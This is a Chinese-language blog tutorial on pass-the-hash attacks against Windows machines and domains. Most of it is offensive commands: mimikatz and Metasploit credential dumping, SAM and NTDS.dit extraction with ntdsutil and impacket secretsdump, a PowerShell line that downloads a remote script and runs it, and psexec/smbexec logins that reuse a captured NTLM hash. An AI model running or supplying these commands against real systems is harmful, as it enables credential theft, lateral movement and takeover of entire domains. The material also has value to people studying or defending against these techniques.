PTH攻击(hash传递)

2022-03-09 16:32:43 浏览数 (2)

PTH

即Pass-The-Hash,首先我们来说下为什么要使用HASH传递,一是再目标机>=win server 2012时,lsass.exe进程中是抓不到明文密码的,二是随着信息安全意识的提高,弱口令情况逐渐降低,我们经常会遇到拿到hash却解不开的情况,综上,只有hash,我们依然可以正常登录。

PTH攻击最酷的地方并不是hash传递利用的过程,而是hash的获取过程,所以接下来90%的篇幅为hash获取的内容,开工!

Hash获取

普通PC的Hash获取

一、mimikatz

本地抓取,前提得拥有本地管理员的执行的权限

代码语言:javascript复制
privilege::debug
sekurlsa::logonpasswords

二、Nishang

powershell的代表,具备获取hash的能力

代码语言:javascript复制
powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.15.216:8888/Gather/Get-PassHashes.ps1');Get-PassHashes

三、msf

msf支持的hash获取方式:

代码语言:javascript复制
hashdump
run hashdump
run post/windows/gather/smart_hashdump
除了meterpreter自带的,还可以通过加载mimikatz获得:
load mimikatz(必须,否则无以下命令)
msv
tspkg
wdigest
kerberos
ssp

对应字段如下,着重提下ssp,之前没留意这个字段,今天才发现记录的居然是ipc$的密码,惊,因为小伙伴刚刚传过文件,所以这里有记录了,所以给打个码。

mimikatz的原生命令在这里有些不在适用,但记得hash获取命令:

代码语言:javascript复制
mimikatz_command -f samdump::hashes

四、SAM表获取hash

导出SAM数据:

代码语言:javascript复制
reg save HKLMSYSTEM SYSTEM
reg save HKLMSAM SAM

mimikatz提取hash:

代码语言:javascript复制
lsadump::sam /sam:SAM /system:SYSTEM

五、域的Hash获取

一:即使是DC,常规获取hash的思路你依然只能获取本地用户的hash,并不能获取整个域的用户hash,当然,你依然可以拿到域管理员的hash,确实也有了登录整个域的权限。 二:即使是域内用户机,常规获取hash的思路依然有可能拿到域管理员的hash,只要域管理员通过RDP登录过,就会将hash保存到lsass中。

NTDS.dit获取DC(域控)的hash

这个思路在域渗透中尤为重要,因为这里面包含着所有域用户的hash,当然该思路只对DC生效。

手动导出NTDS.dit和System-hive,本地或目标机导hash,因为,如果域足够大,该文件也会特别大。

除了手动找路径,可以参见下面的导出命令:

代码语言:javascript复制
ntdsutil "ac i ntds" ifm "create full c:userstmp" q q

接下来我们需要提取用户hash,推荐NTDSDumpEx:

工具地址:https://github.com/zcgonvh/NTDSDumpEx/releases

代码语言:javascript复制
NTDSDumpEx -d ntds.dit -s system -o domain.txt

python第三方库impacket下的secretsdump。

代码语言:javascript复制
python secretsdump.py -system SYSTEM -ntds ntds.dit local

secretsdump脚本直接导出域hash

导出本地SAM中的hash:

代码语言:javascript复制
python secretsdump.py rabbitmask:1q2w3e4r!@192.168.15.181

所有域内用户的IP,全部获取成功。

六、Hash传递

两种Hash传递方式

msf_psexec模块

代码语言:javascript复制
use exploit/windows/smb/psexec
set rhosts 192.168.15.181
set smbuser rabbitmask
set smbpass aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4

impacket_smbexec

代码语言:javascript复制
python smbexec.py -hash esaad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4 rabbitmask@192.168.15.181
代码语言:javascript复制
python smbexec.py -hashes :0515322a55615056aaabb044a48463a4 rabbitmask@192.168.15.181

0 人点赞